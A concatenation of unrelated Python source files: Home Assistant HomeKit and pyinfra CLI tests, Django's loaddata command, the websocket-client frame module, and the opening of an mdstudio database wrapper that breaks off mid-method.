read_data_2 = {"AccessoryPairingID": "00:00:00:00:00:00"}
mock_open_2 = mock.mock_open(read_data=json.dumps(read_data_2))
side_effects = [mock_open_1.return_value, mock_open_2.return_value]
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "c#": 1, "sf": 0},
}
flow = _setup_flow_handler(hass)
pairing_cls_imp = (
"homeassistant.components.homekit_controller.config_flow.IpPairing"
)
with mock.patch(pairing_cls_imp) as pairing_cls:
pairing_cls.return_value = pairing
with mock.patch("builtins.open", side_effect=side_effects):
with mock.patch("os.path", mock_path):
with mock.patch("os.listdir", mock_listdir):
result = await flow.async_step_zeroconf(discovery_info)
await hass.async_block_till_done()
assert result["type"] == "create_entry"
assert result["title"] == "TestDevice"
assert result["data"]["AccessoryPairingID"] == "00:00:00:00:00:00"
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
|
|
from os import path
from random import shuffle
from unittest import TestCase
from click.testing import CliRunner
import pyinfra
from pyinfra import pseudo_state
from pyinfra_cli.main import _main, cli
from ..paramiko_util import PatchSSHTestCase
def run_cli(*arguments):
pyinfra.is_cli = True
runner = CliRunner(mix_stderr=False)
result = runner.invoke(cli, arguments)
pyinfra.is_cli = False
return result
class TestCliEagerFlags(TestCase):
def test_print_help(self):
result = run_cli('--version')
assert result.exit_code == 0, result.stderr
result = run_cli('--help')
assert result.exit_code == 0, result.stderr
def test_print_facts_list(self):
result = run_cli('--facts')
assert result.exit_code == 0, result.stderr
def test_print_operations_list(self):
result = run_cli('--operations')
assert result.exit_code == 0, result.stderr
class TestDeployCli(PatchSSHTestCase):
def setUp(self):
pseudo_state.reset()
def test_invalid_deploy(self):
result = run_cli(
'@local',
'not-a-file.py',
)
assert result.exit_code == 1, result.stderr
assert 'No deploy file: not-a-file.py' in result.stderr
class TestOperationCli(PatchSSHTestCase):
def test_invalid_operation_module(self):
result = run_cli(
path.join('tests', 'deploy', 'inventories', 'inventory.py'),
'not_a_module.shell',
)
assert result.exit_code == 1, result.stderr
assert 'No such module: not_a_module'
def test_invalid_operation_function(self):
result = run_cli(
path.join('tests', 'deploy', 'inventories', 'inventory.py'),
'server.not_an_operation',
)
assert result.exit_code == 1, result.stderr
assert 'No such operation: server.not_an_operation'
def test_deploy_inventory(self):
result = run_cli(
path.join('tests', 'deploy', 'inventories', 'inventory.py'),
'server.shell',
'--debug-data',
)
assert result.exit_code == 0, result.stderr
def test_deploy_operation(self):
result = run_cli(
path.join('tests', 'deploy', 'inventories', 'inventory.py'),
'server.shell',
'echo hi',
)
assert result.exit_code == 0, result.stderr
def test_deploy_operation_with_all(self):
result = run_cli(
path.join('tests', 'deploy', 'inventory_all.py'),
'server.shell',
'echo hi',
)
assert result.exit_code == 0, result.stderr
def test_deploy_operation_json_args(self):
result = run_cli(
path.join('tests', 'deploy', 'inventory_all.py'),
'server.shell',
'[["echo hi"], {}]',
)
assert result.exit_code == 0, result.stderr
class TestFactCli(PatchSSHTestCase):
def test_get_fact(self):
result = run_cli(
path.join('tests', 'deploy', 'inventories', 'inventory.py'),
'fact',
'server.Os',
)
assert result.exit_code == 0, result.stderr
assert '"somehost": null' in result.stderr
def test_get_fact_with_kwargs(self):
result = run_cli(
path.join('tests', 'deploy', 'inventories', 'inventory.py'),
'fact',
'files.File',
'path=.',
)
assert result.exit_code == 0, result.stderr
assert '"somehost": null' in result.stderr
def test_invalid_fact_module(self):
result = run_cli(
path.join('tests', 'deploy', 'inventories', 'inventory.py'),
'fact',
'not_a_module.NotAFact',
)
assert result.exit_code == 1, result.stderr
assert 'No such module: not_a_module' in result.stderr
def test_invalid_fact_class(self):
result = run_cli(
path.join('tests', 'deploy', 'inventories', 'inventory.py'),
'fact',
'server.NotAFact',
)
assert result.exit_code == 1, result.stderr
assert 'No such fact: server.NotAFact' in result.stderr
def test_get_facts_legacy(self):
result = run_cli(
path.join('tests', 'deploy', 'inventories', 'inventory.py'),
'fact',
'os',
)
assert result.exit_code == 0, result.stderr
assert '"somehost": null' in result.stderr
class TestExecCli(PatchSSHTestCase):
def test_exec_command(self):
result = run_cli(
path.join('tests', 'deploy', 'inventories', 'inventory.py'),
'exec',
'--',
'echo hi',
)
assert result.exit_code == 0, result.stderr
def test_exec_command_with_options(self):
result = run_cli(
path.join('tests', 'deploy', 'inventories', 'inventory.py'),
'exec',
'--sudo',
'--sudo-user', 'pyinfra',
'--su-user', 'pyinfrawhat',
'--port', '1022',
'--user', 'ubuntu',
'--',
'echo hi',
)
assert result.exit_code == 0, result.stderr
def test_exec_command_with_serial(self):
result = run_cli(
path.join('tests', 'deploy', 'inventories', 'inventory.py'),
'exec',
'--serial',
'--',
'echo hi',
)
assert result.exit_code == 0, result.stderr
def test_exec_command_with_no_wait(self):
result = run_cli(
path.join('tests', 'deploy', 'inventories', 'inventory.py'),
'exec',
'--no-wait',
'--',
'echo hi',
)
assert result.exit_code == 0, result.stderr
def test_exec_command_with_debug_operations(self):
result = run_cli(
path.join('tests', 'deploy', 'inventories', 'inventory.py'),
'exec',
'--debug-operations',
'--',
'echo hi',
)
assert result.exit_code == 0, result.stderr
def test_exec_command_with_debug_facts(self):
result = run_cli(
path.join('tests', 'deploy', 'inventories', 'inventory.py'),
'exec',
'--debug-facts',
'--',
'echo hi',
)
assert result.exit_code == 0, result.stderr
def test_exec_command_with_debug_data_limit(self):
result = run_cli(
path.join('tests', 'deploy', 'inventories', 'inventory.py'),
'exec',
'--debug-data',
'--limit', 'somehost',
'--',
'echo hi',
)
assert result.exit_code == 0, result.stderr
class TestCliDeployState(PatchSSHTestCase):
def _assert_op_data(self, correct_op_name_and_host_names):
state = pseudo_state
op_order = state.get_op_order()
assert (
len(correct_op_name_and_host_names) == len(op_order)
), 'Incorrect number of operations detected'
for i, (correct_op_name, correct_host_names) in enumerate(
correct_op_name_and_host_names,
):
op_hash = op_order[i]
op_meta = state.op_meta[op_hash]
assert list(op_meta['names'])[0] == correct_op_name
for host in state.inventory:
op_hashes = state.meta[host]['op_hashes']
if correct_host_names is True or host.name in correct_host_names:
self.assertIn(op_hash, op_hashes)
else:
self.assertNotIn(op_hash, op_hashes)
def test_deploy(self):
task_file_path = path.join('tests', 'deploy', 'tasks', 'a_task.py')
nested_task_path = path.join('tests', 'deploy', 'tasks', 'another_task.py')
correct_op_name_and_host_names = [
('First main operation', True), # true for all hosts
('Second main operation', ('somehost',)),
('{0} | First task operation'.format(task_file_path), ('anotherhost',)),
('{0} | Task order loop 1'.format(task_file_path), ('anotherhost',)),
('{0} | 2nd Task order loop 1'.format(task_file_path), ('anotherhost',)),
('{0} | Task order loop 2'.format(task_file_path), ('anotherhost',)),
('{0} | 2nd Task order loop 2'.format(task_file_path), ('anotherhost',)),
(
'{0} | {1} | Second task operation'.format(task_file_path, nested_task_path),
('anotherhost',),
),
('{0} | First task operation'.format(task_file_path), True),
('{0} | Task order loop 1'.format(task_file_path), True),
('{0} | 2nd Task order loop 1'.format(task_file_path), True),
('{0} | Task order loop 2'.format(task_file_path), True),
('{0} | 2nd Task order loop 2'.format(task_file_path), True),
('{0} | {1} | Second task operation'.format(task_file_path, nested_task_path), True),
('My deploy | First deploy operation', True),
('My deploy | My nested deploy | First nested deploy operation', True),
('My deploy | Second deploy operation', True),
('Loop-0 main operation', True),
('Loop-1 main operation', True),
('Third main operation', True),
('Order loop 1', True),
('2nd Order loop 1', True),
('Order loop 2', True),
('2nd Order loop 2', True),
('Final limited operation', ('somehost',)),
]
# Run 3 iterations of the test - each time shuffling the order of the
# hosts - ensuring that the ordering has no effect on the operation order.
for _ in range(3):
pseudo_state.reset()
hosts = ['somehost', 'anotherhost', 'someotherhost']
shuffle(hosts)
result = run_cli(
','.join(hosts),
path.join('tests', 'deploy', 'deploy.py'),
)
assert result.exit_code == 0, result.stderr
self._assert_op_data(correct_op_name_and_host_names)
def test_legacy_deploy(self):
pseudo_state.reset()
result = run_cli(
'somehost',
path.join('tests', 'deploy', 'deploy_legacy.py'),
)
assert result.exit_code == 0, result.stderr
correct_op_name_and_host_names = [
('First main operation', True),
('My deploy | My nested deploy | First nested deploy operation', True),
('My deploy | Second deploy operation', True),
]
self._assert_op_data(correct_op_name_and_host_names)
def test_interdependent_deploy(self):
pseudo_state.reset()
result = run_cli(
'somehost',
path.join('tests', 'deploy', 'deploy_interdependent.py'),
)
assert result.exit_code == 0, result.stderr
# Check every operation had commands/changes - this ensures that each
# combo (add/remove/add) always had changes.
for host, ops in pseudo_state.ops.items():
for _, op in ops.items():
assert len(op['commands']) > 0
class TestDirectMainExecution(PatchSSHTestCase):
'''
These tests are very similar as above, without the click wrappers - basically
here because coverage.py fails to properly detect all the code under the wrapper.
'''
def test_deploy_operation_direct(self):
with self.assertRaises(SystemExit) as e:
_main(
inventory=path.join('tests', 'test_deploy', 'inventories', 'inventory.py'),
operations=['server.shell', 'echo hi'],
verbosity=0, ssh_user=None, ssh_port=None, ssh_key=None, ssh_key_password=None,
ssh_password=None,
sudo=False, sudo_user=None, use_sudo_password=False, su_user=None,
parallel=None, fail_percent=0, dry=False, limit=None, no_wait=False, serial=False,
winrm_username=None, winrm_password=None, winrm_port=None, winrm_transport=None,
shell_executable=None, quiet=False, data=tuple(),
debug=False, debug_data=False, debug_facts=False, debug_operations=False,
config_filename='config.py',
)
assert e.args == (0,)
|
|
from __future__ import unicode_literals
import glob
import gzip
import os
import warnings
import zipfile
from django.apps import apps
from django.conf import settings
from django.core import serializers
from django.core.exceptions import ImproperlyConfigured
from django.core.management.base import BaseCommand, CommandError
from django.core.management.color import no_style
from django.db import (connections, router, transaction, DEFAULT_DB_ALIAS,
IntegrityError, DatabaseError)
from django.utils import lru_cache
from django.utils.encoding import force_text
from django.utils.functional import cached_property
from django.utils._os import upath
from django.utils.deprecation import RemovedInDjango19Warning
from itertools import product
try:
import bz2
has_bz2 = True
except ImportError:
has_bz2 = False
class Command(BaseCommand):
help = 'Installs the named fixture(s) in the database.'
missing_args_message = ("No database fixture specified. Please provide the "
"path of at least one fixture in the command line.")
def add_arguments(self, parser):
parser.add_argument('args', metavar='fixture', nargs='+',
help='Fixture labels.')
parser.add_argument('--database', action='store', dest='database',
default=DEFAULT_DB_ALIAS, help='Nominates a specific database to load '
'fixtures into. Defaults to the "default" database.')
parser.add_argument('--app', action='store', dest='app_label',
default=None, help='Only look for fixtures in the specified app.')
parser.add_argument('--ignorenonexistent', '-i', action='store_true',
dest='ignore', default=False,
help='Ignores entries in the serialized data for fields that do not '
'currently exist on the model.')
def handle(self, *fixture_labels, **options):
self.ignore = options.get('ignore')
self.using = options.get('database')
self.app_label = options.get('app_label')
self.hide_empty = options.get('hide_empty', False)
self.verbosity = options.get('verbosity')
with transaction.atomic(using=self.using):
self.loaddata(fixture_labels)
# Close the DB connection -- unless we're still in a transaction. This
# is required as a workaround for an edge case in MySQL: if the same
# connection is used to create tables, load data, and query, the query
# can return incorrect results. See Django #7572, MySQL #37735.
if transaction.get_autocommit(self.using):
connections[self.using].close()
def loaddata(self, fixture_labels):
connection = connections[self.using]
# Keep a count of the installed objects and fixtures
self.fixture_count = 0
self.loaded_object_count = 0
self.fixture_object_count = 0
self.models = set()
self.serialization_formats = serializers.get_public_serializer_formats()
# Forcing binary mode may be revisited after dropping Python 2 support (see #22399)
self.compression_formats = {
None: (open, 'rb'),
'gz': (gzip.GzipFile, 'rb'),
'zip': (SingleZipReader, 'r'),
}
if has_bz2:
self.compression_formats['bz2'] = (bz2.BZ2File, 'r')
with connection.constraint_checks_disabled():
for fixture_label in fixture_labels:
self.load_label(fixture_label)
# Since we disabled constraint checks, we must manually check for
# any invalid keys that might have been added
table_names = [model._meta.db_table for model in self.models]
try:
connection.check_constraints(table_names=table_names)
except Exception as e:
e.args = ("Problem installing fixtures: %s" % e,)
raise
# If we found even one object in a fixture, we need to reset the
# database sequences.
if self.loaded_object_count > 0:
sequence_sql = connection.ops.sequence_reset_sql(no_style(), self.models)
if sequence_sql:
if self.verbosity >= 2:
self.stdout.write("Resetting sequences\n")
with connection.cursor() as cursor:
for line in sequence_sql:
cursor.execute(line)
if self.verbosity >= 1:
if self.fixture_count == 0 and self.hide_empty:
pass
elif self.fixture_object_count == self.loaded_object_count:
self.stdout.write("Installed %d object(s) from %d fixture(s)" %
(self.loaded_object_count, self.fixture_count))
else:
self.stdout.write("Installed %d object(s) (of %d) from %d fixture(s)" %
(self.loaded_object_count, self.fixture_object_count, self.fixture_count))
def load_label(self, fixture_label):
"""
Loads fixtures files for a given label.
"""
for fixture_file, fixture_dir, fixture_name in self.find_fixtures(fixture_label):
_, ser_fmt, cmp_fmt = self.parse_name(os.path.basename(fixture_file))
open_method, mode = self.compression_formats[cmp_fmt]
fixture = open_method(fixture_file, mode)
try:
self.fixture_count += 1
objects_in_fixture = 0
loaded_objects_in_fixture = 0
if self.verbosity >= 2:
self.stdout.write("Installing %s fixture '%s' from %s." %
(ser_fmt, fixture_name, humanize(fixture_dir)))
objects = serializers.deserialize(ser_fmt, fixture,
using=self.using, ignorenonexistent=self.ignore)
for obj in objects:
objects_in_fixture += 1
if router.allow_migrate(self.using, obj.object.__class__):
loaded_objects_in_fixture += 1
self.models.add(obj.object.__class__)
try:
obj.save(using=self.using)
except (DatabaseError, IntegrityError) as e:
e.args = ("Could not load %(app_label)s.%(object_name)s(pk=%(pk)s): %(error_msg)s" % {
'app_label': obj.object._meta.app_label,
'object_name': obj.object._meta.object_name,
'pk': obj.object.pk,
'error_msg': force_text(e)
},)
raise
self.loaded_object_count += loaded_objects_in_fixture
self.fixture_object_count += objects_in_fixture
except Exception as e:
if not isinstance(e, CommandError):
e.args = ("Problem installing fixture '%s': %s" % (fixture_file, e),)
raise
finally:
fixture.close()
# Warn if the fixture we loaded contains 0 objects.
if objects_in_fixture == 0:
warnings.warn(
"No fixture data found for '%s'. (File format may be "
"invalid.)" % fixture_name,
RuntimeWarning
)
@lru_cache.lru_cache(maxsize=None)
def find_fixtures(self, fixture_label):
"""
Finds fixture files for a given label.
"""
fixture_name, ser_fmt, cmp_fmt = self.parse_name(fixture_label)
databases = [self.using, None]
cmp_fmts = list(self.compression_formats.keys()) if cmp_fmt is None else [cmp_fmt]
ser_fmts = serializers.get_public_serializer_formats() if ser_fmt is None else [ser_fmt]
if self.verbosity >= 2:
self.stdout.write("Loading '%s' fixtures..." % fixture_name)
if os.path.isabs(fixture_name):
fixture_dirs = [os.path.dirname(fixture_name)]
fixture_name = os.path.basename(fixture_name)
else:
fixture_dirs = self.fixture_dirs
if os.path.sep in os.path.normpath(fixture_name):
fixture_dirs = [os.path.join(dir_, os.path.dirname(fixture_name))
for dir_ in fixture_dirs]
fixture_name = os.path.basename(fixture_name)
suffixes = ('.'.join(ext for ext in combo if ext)
for combo in product(databases, ser_fmts, cmp_fmts))
targets = set('.'.join((fixture_name, suffix)) for suffix in suffixes)
fixture_files = []
for fixture_dir in fixture_dirs:
if self.verbosity >= 2:
self.stdout.write("Checking %s for fixtures..." % humanize(fixture_dir))
fixture_files_in_dir = []
for candidate in glob.iglob(os.path.join(fixture_dir, fixture_name + '*')):
if os.path.basename(candidate) in targets:
# Save the fixture_dir and fixture_name for future error messages.
fixture_files_in_dir.append((candidate, fixture_dir, fixture_name))
if self.verbosity >= 2 and not fixture_files_in_dir:
self.stdout.write("No fixture '%s' in %s." %
(fixture_name, humanize(fixture_dir)))
# Check kept for backwards-compatibility; it isn't clear why
# duplicates are only allowed in different directories.
if len(fixture_files_in_dir) > 1:
raise CommandError(
"Multiple fixtures named '%s' in %s. Aborting." %
(fixture_name, humanize(fixture_dir)))
fixture_files.extend(fixture_files_in_dir)
if fixture_name != 'initial_data' and not fixture_files:
# Warning kept for backwards-compatibility; why not an exception?
warnings.warn("No fixture named '%s' found." % fixture_name)
elif fixture_name == 'initial_data' and fixture_files:
warnings.warn(
'initial_data fixtures are deprecated. Use data migrations instead.',
RemovedInDjango19Warning
)
return fixture_files
@cached_property
def fixture_dirs(self):
"""
Return a list of fixture directories.
The list contains the 'fixtures' subdirectory of each installed
application, if it exists, the directories in FIXTURE_DIRS, and the
current directory.
"""
dirs = []
fixture_dirs = settings.FIXTURE_DIRS
if len(fixture_dirs) != len(set(fixture_dirs)):
raise ImproperlyConfigured("settings.FIXTURE_DIRS contains duplicates.")
for app_config in apps.get_app_configs():
app_label = app_config.label
app_dir = os.path.join(app_config.path, 'fixtures')
if app_dir in fixture_dirs:
raise ImproperlyConfigured(
"'%s' is a default fixture directory for the '%s' app "
"and cannot be listed in settings.FIXTURE_DIRS." % (app_dir, app_label)
)
if self.app_label and app_label != self.app_label:
continue
if os.path.isdir(app_dir):
dirs.append(app_dir)
dirs.extend(list(fixture_dirs))
dirs.append('')
dirs = [upath(os.path.abspath(os.path.realpath(d))) for d in dirs]
return dirs
def parse_name(self, fixture_name):
"""
Splits fixture name in name, serialization format, compression format.
"""
parts = fixture_name.rsplit('.', 2)
if len(parts) > 1 and parts[-1] in self.compression_formats:
cmp_fmt = parts[-1]
parts = parts[:-1]
else:
cmp_fmt = None
if len(parts) > 1:
if parts[-1] in self.serialization_formats:
ser_fmt = parts[-1]
parts = parts[:-1]
else:
raise CommandError(
"Problem installing fixture '%s': %s is not a known "
"serialization format." % (''.join(parts[:-1]), parts[-1]))
else:
ser_fmt = None
name = '.'.join(parts)
return name, ser_fmt, cmp_fmt
class SingleZipReader(zipfile.ZipFile):
def __init__(self, *args, **kwargs):
zipfile.ZipFile.__init__(self, *args, **kwargs)
if len(self.namelist()) != 1:
raise ValueError("Zip-compressed fixtures must contain one file.")
def read(self):
return zipfile.ZipFile.read(self, self.namelist()[0])
def humanize(dirname):
return "'%s'" % dirname if dirname else 'absolute path'
|
|
"""
websocket - WebSocket client library for Python
Copyright (C) 2010 Hiroki Ohtani(liris)
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor,
Boston, MA 02110-1335 USA
"""
import six
import array
import struct
import os
from ._exceptions import *
from ._utils import validate_utf8
try:
# If wsaccel is available we use compiled routines to mask data.
from wsaccel.xormask import XorMaskerSimple
def _mask(_m, _d):
return XorMaskerSimple(_m).process(_d)
except ImportError:
# wsaccel is not available, we rely on python implementations.
def _mask(_m, _d):
for i in range(len(_d)):
_d[i] ^= _m[i % 4]
if six.PY3:
return _d.tobytes()
else:
return _d.tostring()
# closing frame status codes.
STATUS_NORMAL = 1000
STATUS_GOING_AWAY = 1001
STATUS_PROTOCOL_ERROR = 1002
STATUS_UNSUPPORTED_DATA_TYPE = 1003
STATUS_STATUS_NOT_AVAILABLE = 1005
STATUS_ABNORMAL_CLOSED = 1006
STATUS_INVALID_PAYLOAD = 1007
STATUS_POLICY_VIOLATION = 1008
STATUS_MESSAGE_TOO_BIG = 1009
STATUS_INVALID_EXTENSION = 1010
STATUS_UNEXPECTED_CONDITION = 1011
STATUS_TLS_HANDSHAKE_ERROR = 1015
VALID_CLOSE_STATUS = (
STATUS_NORMAL,
STATUS_GOING_AWAY,
STATUS_PROTOCOL_ERROR,
STATUS_UNSUPPORTED_DATA_TYPE,
STATUS_INVALID_PAYLOAD,
STATUS_POLICY_VIOLATION,
STATUS_MESSAGE_TOO_BIG,
STATUS_INVALID_EXTENSION,
STATUS_UNEXPECTED_CONDITION,
)
class ABNF(object):
"""
ABNF frame class.
see http://tools.ietf.org/html/rfc5234
and http://tools.ietf.org/html/rfc6455#section-5.2
"""
# operation code values.
OPCODE_CONT = 0x0
OPCODE_TEXT = 0x1
OPCODE_BINARY = 0x2
OPCODE_CLOSE = 0x8
OPCODE_PING = 0x9
OPCODE_PONG = 0xa
# available operation code value tuple
OPCODES = (OPCODE_CONT, OPCODE_TEXT, OPCODE_BINARY, OPCODE_CLOSE,
OPCODE_PING, OPCODE_PONG)
# opcode human readable string
OPCODE_MAP = {
OPCODE_CONT: "cont",
OPCODE_TEXT: "text",
OPCODE_BINARY: "binary",
OPCODE_CLOSE: "close",
OPCODE_PING: "ping",
OPCODE_PONG: "pong"
}
# data length threshold.
LENGTH_7 = 0x7e
LENGTH_16 = 1 << 16
LENGTH_63 = 1 << 63
def __init__(self, fin=0, rsv1=0, rsv2=0, rsv3=0,
opcode=OPCODE_TEXT, mask=1, data=""):
"""
Constructor for ABNF.
please check RFC for arguments.
"""
self.fin = fin
self.rsv1 = rsv1
self.rsv2 = rsv2
self.rsv3 = rsv3
self.opcode = opcode
self.mask = mask
if data == None:
data = ""
self.data = data
self.get_mask_key = os.urandom
def validate(self, skip_utf8_validation=False):
"""
validate the ABNF frame.
skip_utf8_validation: skip utf8 validation.
"""
if self.rsv1 or self.rsv2 or self.rsv3:
raise WebSocketProtocolException("rsv is not implemented, yet")
if self.opcode not in ABNF.OPCODES:
raise WebSocketProtocolException("Invalid opcode %r", self.opcode)
if self.opcode == ABNF.OPCODE_PING and not self.fin:
raise WebSocketProtocolException("Invalid ping frame.")
if self.opcode == ABNF.OPCODE_CLOSE:
l = len(self.data)
if not l:
return
if l == 1 or l >= 126:
raise WebSocketProtocolException("Invalid close frame.")
if l > 2 and not skip_utf8_validation and not validate_utf8(self.data[2:]):
raise WebSocketProtocolException("Invalid close frame.")
code = 256*six.byte2int(self.data[0:1]) + six.byte2int(self.data[1:2])
if not self._is_valid_close_status(code):
raise WebSocketProtocolException("Invalid close opcode.")
def _is_valid_close_status(self, code):
return code in VALID_CLOSE_STATUS or (3000 <= code <5000)
def __str__(self):
return "fin=" + str(self.fin) \
+ " opcode=" + str(self.opcode) \
+ " data=" + str(self.data)
@staticmethod
def create_frame(data, opcode, fin=1):
"""
create frame to send text, binary and other data.
data: data to send. This is string value(byte array).
if opcode is OPCODE_TEXT and this value is unicode,
data value is converted into unicode string, automatically.
opcode: operation code. please see OPCODE_XXX.
fin: fin flag. if set to 0, create continue fragmentation.
"""
if opcode == ABNF.OPCODE_TEXT and isinstance(data, six.text_type):
data = data.encode("utf-8")
# mask must be set if send data from client
return ABNF(fin, 0, 0, 0, opcode, 1, data)
def format(self):
"""
format this object to string(byte array) to send data to server.
"""
if any(x not in (0, 1) for x in [self.fin, self.rsv1, self.rsv2, self.rsv3]):
raise ValueError("not 0 or 1")
if self.opcode not in ABNF.OPCODES:
raise ValueError("Invalid OPCODE")
length = len(self.data)
if length >= ABNF.LENGTH_63:
raise ValueError("data is too long")
frame_header = chr(self.fin << 7
| self.rsv1 << 6 | self.rsv2 << 5 | self.rsv3 << 4
| self.opcode)
if length < ABNF.LENGTH_7:
frame_header += chr(self.mask << 7 | length)
frame_header = six.b(frame_header)
elif length < ABNF.LENGTH_16:
frame_header += chr(self.mask << 7 | 0x7e)
frame_header = six.b(frame_header)
frame_header += struct.pack("!H", length)
else:
frame_header += chr(self.mask << 7 | 0x7f)
frame_header = six.b(frame_header)
frame_header += struct.pack("!Q", length)
if not self.mask:
return frame_header + self.data
else:
mask_key = self.get_mask_key(4)
return frame_header + self._get_masked(mask_key)
def _get_masked(self, mask_key):
s = ABNF.mask(mask_key, self.data)
if isinstance(mask_key, six.text_type):
mask_key = mask_key.encode('utf-8')
return mask_key + s
@staticmethod
def mask(mask_key, data):
"""
mask or unmask data. Just do xor for each byte
mask_key: 4 byte string(byte).
data: data to mask/unmask.
"""
if data == None:
data = ""
if isinstance(mask_key, six.text_type):
mask_key = six.b(mask_key)
if isinstance(data, six.text_type):
data = six.b(data)
_m = array.array("B", mask_key)
_d = array.array("B", data)
return _mask(_m, _d)
class frame_buffer(object):
_HEADER_MASK_INDEX = 5
_HEADER_LENGHT_INDEX = 6
def __init__(self, recv_fn, skip_utf8_validation):
self.recv = recv_fn
self.skip_utf8_validation = skip_utf8_validation
# Buffers over the packets from the layer beneath until desired amount
# bytes of bytes are received.
self.recv_buffer = []
self.clear()
def clear(self):
self.header = None
self.length = None
self.mask = None
def has_received_header(self):
return self.header is None
def recv_header(self):
header = self.recv_strict(2)
b1 = header[0]
if six.PY2:
b1 = ord(b1)
fin = b1 >> 7 & 1
rsv1 = b1 >> 6 & 1
rsv2 = b1 >> 5 & 1
rsv3 = b1 >> 4 & 1
opcode = b1 & 0xf
b2 = header[1]
if six.PY2:
b2 = ord(b2)
has_mask = b2 >> 7 & 1
length_bits = b2 & 0x7f
self.header = (fin, rsv1, rsv2, rsv3, opcode, has_mask, length_bits)
def has_mask(self):
if not self.header:
return False
return self.header[frame_buffer._HEADER_MASK_INDEX]
def has_received_length(self):
return self.length is None
def recv_length(self):
bits = self.header[frame_buffer._HEADER_LENGHT_INDEX]
length_bits = bits & 0x7f
if length_bits == 0x7e:
v = self.recv_strict(2)
self.length = struct.unpack("!H", v)[0]
elif length_bits == 0x7f:
v = self.recv_strict(8)
self.length = struct.unpack("!Q", v)[0]
else:
self.length = length_bits
def has_received_mask(self):
return self.mask is None
def recv_mask(self):
self.mask = self.recv_strict(4) if self.has_mask() else ""
def recv_frame(self):
# Header
if self.has_received_header():
self.recv_header()
(fin, rsv1, rsv2, rsv3, opcode, has_mask, _) = self.header
# Frame length
if self.has_received_length():
self.recv_length()
length = self.length
# Mask
if self.has_received_mask():
self.recv_mask()
mask = self.mask
# Payload
payload = self.recv_strict(length)
if has_mask:
payload = ABNF.mask(mask, payload)
# Reset for next frame
self.clear()
frame = ABNF(fin, rsv1, rsv2, rsv3, opcode, has_mask, payload)
frame.validate(self.skip_utf8_validation)
return frame
def recv_strict(self, bufsize):
shortage = bufsize - sum(len(x) for x in self.recv_buffer)
while shortage > 0:
# Limit buffer size that we pass to socket.recv() to avoid
# fragmenting the heap -- the number of bytes recv() actually
# reads is limited by socket buffer and is relatively small,
# yet passing large numbers repeatedly causes lots of large
# buffers allocated and then shrunk, which results in fragmentation.
bytes = self.recv(min(16384, shortage))
self.recv_buffer.append(bytes)
shortage -= len(bytes)
unified = six.b("").join(self.recv_buffer)
if shortage == 0:
self.recv_buffer = []
return unified
else:
self.recv_buffer = [unified[bufsize:]]
return unified[:bufsize]
class continuous_frame(object):
def __init__(self, fire_cont_frame, skip_utf8_validation):
self.fire_cont_frame = fire_cont_frame
self.skip_utf8_validation = skip_utf8_validation
self.cont_data = None
self.recving_frames = None
def validate(self, frame):
if not self.recving_frames and frame.opcode == ABNF.OPCODE_CONT:
raise WebSocketProtocolException("Illegal frame")
if self.recving_frames and frame.opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
raise WebSocketProtocolException("Illegal frame")
def add(self, frame):
if self.cont_data:
self.cont_data[1] += frame.data
else:
if frame.opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
self.recving_frames = frame.opcode
self.cont_data = [frame.opcode, frame.data]
if frame.fin:
self.recving_frames = None
def is_fire(self, frame):
return frame.fin or self.fire_cont_frame
def extract(self, frame):
data = self.cont_data
self.cont_data = None
frame.data = data[1]
if not self.fire_cont_frame and data[0] == ABNF.OPCODE_TEXT and not self.skip_utf8_validation and not validate_utf8(frame.data):
raise WebSocketPayloadException("cannot decode: " + repr(frame.data))
return [data[0], frame]
|
|
# coding=utf-8
import copy
from typing import Dict, Any, List, Optional
from mdstudio.api.context import ContextCallable
from mdstudio.db.sort_mode import SortMode
from mdstudio.db.connection_type import ConnectionType
from mdstudio.db.cursor import Cursor
from mdstudio.db.database import IDatabase, CollectionType, DocumentType, Fields, ProjectionOperators, \
SortOperators, AggregationOperator
from mdstudio.db.index import Index
from mdstudio.deferred.chainable import chainable
from mdstudio.deferred.return_value import return_value
# noinspection PyShadowingBuiltins
class SessionDatabaseWrapper(IDatabase, ContextCallable):
def __init__(self, session, connection_type=ConnectionType.User):
# type: (CommonSession, ConnectionType) -> None
self.session = session # type: CommonSession
self.connection_type = connection_type
ContextCallable.__init__(self, session)
def more(self, cursor_id):
# type: (str) -> Dict[str, Any]
return self._call('more', {
'cursorId': cursor_id
})
def rewind(self, cursor_id):
# type: (str) -> Dict[str, Any]
return self._call('rewind', {
'cursorId': cursor_id
})
def insert_one(self, collection, insert, fields=None):
# type: (CollectionType, DocumentType, Optional[Fields]) -> Dict[str, Any]
request = {
'collection': collection,
'insert': insert
}
if fields:
request['fields'] = fields.to_dict()
return self._call('insert_one', request)
def insert_many(self, collection, insert, fields=None):
# type: (CollectionType, List[DocumentType], Optional[Fields]) -> Dict[str, Any]
request = {
'collection': collection,
'insert': insert
}
if fields:
request['fields'] = fields.to_dict()
return self._call('insert_many', request)
def replace_one(self, collection, filter, replacement, upsert=False, fields=None):
# type: (CollectionType, DocumentType, DocumentType, bool, Optional[Fields]) -> Dict[str, Any]
request = {
'collection': collection,
'filter': filter,
'replacement': replacement,
'upsert': upsert
}
if fields:
request['fields'] = fields.to_dict()
return self._call('replace_one', request)
def count(self, collection, filter=None, skip=None, limit=None, fields=None, cursor_id=None, with_limit_and_skip=False):
# type: (CollectionType, Optional[DocumentType], Optional[int], Optional[int], Optional[Fields], Optional[str], bool) -> Dict[str, Any]
request = {
'collection': collection
}
# either we use the cursor_id or we start a new query
if cursor_id:
request['cursorId'] = cursor_id
if with_limit_and_skip:
request['withLimitAndSkip'] = with_limit_and_skip
else:
if filter:
request['filter'] = filter
if skip:
request['skip'] = skip
if limit:
request['limit'] = limit
if fields:
request['fields'] = fields.to_dict()
return self._call('count', request)
def update_one(self, collection, filter, update, upsert=False, fields=None):
